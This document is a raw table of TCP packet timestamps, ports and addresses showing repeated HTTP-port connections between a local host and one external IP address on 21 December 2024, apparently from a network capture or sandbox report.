Dec 21, 2024 10:02:41.408023119 CET	80	49765	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:41.640348911 CET	49765	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:41.760112047 CET	80	49765	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:41.760148048 CET	80	49765	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:41.760178089 CET	80	49765	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:42.665683985 CET	80	49765	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:42.765275002 CET	49765	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:42.900325060 CET	80	49765	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:42.953047991 CET	49765	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:43.041294098 CET	49767	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:43.160945892 CET	80	49767	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:43.161031008 CET	49767	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:43.161135912 CET	49767	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:43.280721903 CET	80	49767	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:43.515368938 CET	49767	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:43.635188103 CET	80	49767	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:43.635227919 CET	80	49767	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:43.635258913 CET	80	49767	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:44.546890020 CET	80	49767	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:44.741863966 CET	49765	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:44.765286922 CET	49767	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:44.780072927 CET	80	49767	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:44.952964067 CET	49767	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:45.193048954 CET	49767	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:45.193351030 CET	49774	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:45.312836885 CET	80	49774	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:45.312916040 CET	49774	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:45.312942028 CET	80	49767	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:45.313000917 CET	49767	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:45.313062906 CET	49774	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:45.434017897 CET	80	49774	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:45.441771984 CET	49778	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:45.468765020 CET	49774	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:45.561441898 CET	80	49778	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:45.561517000 CET	49778	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:45.561671972 CET	49778	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:45.636080027 CET	80	49774	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:45.681166887 CET	80	49778	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:45.911245108 CET	49778	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:46.027565956 CET	49779	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:46.030879974 CET	80	49778	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:46.030945063 CET	80	49778	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:46.147196054 CET	80	49779	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:46.147470951 CET	49779	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:46.147713900 CET	49779	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:46.267209053 CET	80	49779	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:46.352395058 CET	80	49774	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:46.352472067 CET	49774	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:46.499732971 CET	49779	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:46.619420052 CET	80	49779	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:46.619510889 CET	80	49779	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:46.619543076 CET	80	49779	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:46.941054106 CET	80	49778	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:47.155919075 CET	49778	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:47.242355108 CET	80	49778	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:47.452794075 CET	49778	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:47.524369955 CET	80	49779	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:47.593420982 CET	49779	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:47.764211893 CET	80	49779	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:47.929801941 CET	49778	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:47.929872990 CET	49779	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:47.930809021 CET	49785	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:48.052500010 CET	80	49778	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:48.052983999 CET	80	49785	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:48.053129911 CET	80	49779	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:48.053227901 CET	49778	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:48.053263903 CET	49779	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:48.053276062 CET	49785	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:48.053894997 CET	49785	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:48.183595896 CET	80	49785	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:48.407465935 CET	49785	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:48.530530930 CET	80	49785	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:48.530551910 CET	80	49785	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:48.530597925 CET	80	49785	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:49.437274933 CET	80	49785	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:49.655931950 CET	49785	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:49.672646046 CET	80	49785	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:49.765290022 CET	49785	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:49.821130037 CET	49785	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:49.821563959 CET	49791	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:49.941128016 CET	80	49791	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:49.941225052 CET	49791	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:49.941250086 CET	80	49785	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:49.941339970 CET	49785	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:49.941368103 CET	49791	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:50.060918093 CET	80	49791	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:50.296624899 CET	49791	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:50.416402102 CET	80	49791	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:50.416455984 CET	80	49791	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:50.416486025 CET	80	49791	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:51.318923950 CET	80	49791	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:51.374669075 CET	49791	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:51.552298069 CET	80	49791	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:51.593580008 CET	49791	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:51.773258924 CET	49791	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:51.773830891 CET	49794	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:51.894105911 CET	80	49791	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:51.894136906 CET	80	49794	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:51.894159079 CET	49791	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:51.894212961 CET	49794	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:51.894328117 CET	49794	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.013832092 CET	80	49794	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.249752045 CET	49794	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.250505924 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.251178026 CET	49794	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.369499922 CET	80	49794	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.369596004 CET	80	49794	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.369630098 CET	80	49794	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.370069027 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.370143890 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.370276928 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.387581110 CET	49799	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.412095070 CET	80	49794	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.489794970 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.507209063 CET	80	49799	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.507282019 CET	49799	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.507416964 CET	49799	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.626909971 CET	80	49799	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.718543053 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.838287115 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.838326931 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.859112024 CET	49799	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.932315111 CET	80	49794	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.932404995 CET	49794	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:52.978842020 CET	80	49799	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.978897095 CET	80	49799	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:52.978926897 CET	80	49799	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:53.746490002 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:53.796555042 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:53.884541988 CET	80	49799	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:53.937175989 CET	49799	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:53.980130911 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:53.980467081 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.100012064 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.127334118 CET	80	49799	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.171636105 CET	49799	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.258661985 CET	49799	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.258908033 CET	49805	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.327996969 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.379374027 CET	80	49805	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.379446030 CET	49805	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.379646063 CET	49805	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.379829884 CET	80	49799	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.379885912 CET	49799	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.439095974 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.447650909 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.447664022 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.447727919 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.447741032 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.447814941 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.447815895 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.447875977 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.447879076 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.447916985 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.447928905 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.447967052 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.448029995 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.448044062 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.448067904 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.448081970 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.448112965 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.448154926 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.448174953 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.448187113 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.448242903 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.499083042 CET	80	49805	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.567399979 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.567414999 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.567500114 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.567501068 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.567569971 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.567599058 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.567651033 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.567681074 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.567759037 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.567799091 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.567823887 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.567893028 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.568114042 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.568125963 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.568175077 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.568187952 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.568234921 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.616095066 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.616159916 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.687155008 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.687252045 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.687402964 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.687474966 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.687482119 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.687536001 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.687541008 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.687592030 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.687608957 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.687668085 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.687674999 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.687823057 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.687835932 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688033104 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688045979 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688154936 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688168049 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688314915 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688405037 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688417912 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688487053 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688559055 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688571930 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688680887 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688694000 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688838959 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688954115 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.688968897 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689022064 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689121962 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689135075 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689218998 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689230919 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689327002 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689338923 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689495087 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689574003 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689671993 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689685106 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689809084 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689821959 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.689925909 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.734133959 CET	49805	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:54.735788107 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.735857010 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.806935072 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.806986094 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.807279110 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.807292938 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.807395935 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.807451963 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.807562113 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.807574987 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.807710886 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.807833910 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.807847023 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.807858944 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.807926893 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.808079958 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.808118105 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.808130980 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.808195114 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.854778051 CET	80	49805	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.854790926 CET	80	49805	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:54.854804039 CET	80	49805	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:55.337810040 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:55.390300989 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:55.772752047 CET	80	49805	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:55.827802896 CET	49805	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:55.996344090 CET	80	49805	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:56.046545982 CET	49805	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:56.121309996 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:56.121584892 CET	49808	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:56.121617079 CET	49805	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:56.241111994 CET	80	49808	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:56.241178989 CET	49808	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:56.241271973 CET	80	49798	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:56.241302013 CET	49808	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:56.241334915 CET	49798	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:56.241755009 CET	80	49805	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:56.241807938 CET	49805	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:56.360862017 CET	80	49808	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:56.593498945 CET	49808	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:56.713630915 CET	80	49808	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:56.713654995 CET	80	49808	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:56.713691950 CET	80	49808	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:57.617976904 CET	80	49808	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:57.671721935 CET	49808	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:57.852189064 CET	80	49808	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:57.905924082 CET	49808	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:57.964606047 CET	49812	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:58.084094048 CET	80	49812	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:58.084180117 CET	49812	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:58.084305048 CET	49812	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:58.203855038 CET	80	49812	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:58.437349081 CET	49812	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:58.557039976 CET	80	49812	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:58.557091951 CET	80	49812	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:58.557128906 CET	80	49812	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:58.984920979 CET	49812	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:58.984983921 CET	49818	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:59.104732990 CET	80	49818	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:59.104810953 CET	49818	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:59.104954004 CET	49818	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:59.105422974 CET	49819	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:59.122163057 CET	80	49812	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:59.122267962 CET	49812	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:59.224466085 CET	80	49818	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:59.224912882 CET	80	49819	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:59.225024939 CET	49819	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:59.225178957 CET	49819	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:59.344717026 CET	80	49819	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:59.452874899 CET	49818	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:59.572599888 CET	80	49818	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:59.572616100 CET	80	49818	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:59.577898979 CET	49819	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:59.697606087 CET	80	49819	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:59.697618961 CET	80	49819	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:59.697671890 CET	80	49819	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:00.482969046 CET	80	49818	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:00.530916929 CET	49818	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:00.603161097 CET	80	49819	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:00.655929089 CET	49819	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:00.716202021 CET	80	49818	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:00.765311003 CET	49818	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:00.836214066 CET	80	49819	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:00.890330076 CET	49819	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:00.952058077 CET	49819	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:00.952074051 CET	49818	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:00.952378035 CET	49826	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:01.072083950 CET	80	49819	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:01.072163105 CET	49819	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:01.072638988 CET	80	49818	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:01.072690010 CET	49818	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:01.072807074 CET	80	49826	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:01.072874069 CET	49826	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:01.072997093 CET	49826	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:01.192492962 CET	80	49826	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:01.421643972 CET	49826	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:01.541260004 CET	80	49826	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:01.541282892 CET	80	49826	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:01.541342020 CET	80	49826	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:02.452472925 CET	80	49826	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:02.499665022 CET	49826	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:02.684040070 CET	80	49826	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:02.734083891 CET	49826	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:02.816746950 CET	49832	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:02.936427116 CET	80	49832	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:02.936505079 CET	49832	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:02.936671019 CET	49832	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:03.056180000 CET	80	49832	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:03.291254044 CET	49832	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:03.411396980 CET	80	49832	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:03.411515951 CET	80	49832	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:03.411650896 CET	80	49832	89.23.96.180	192.168.2.5
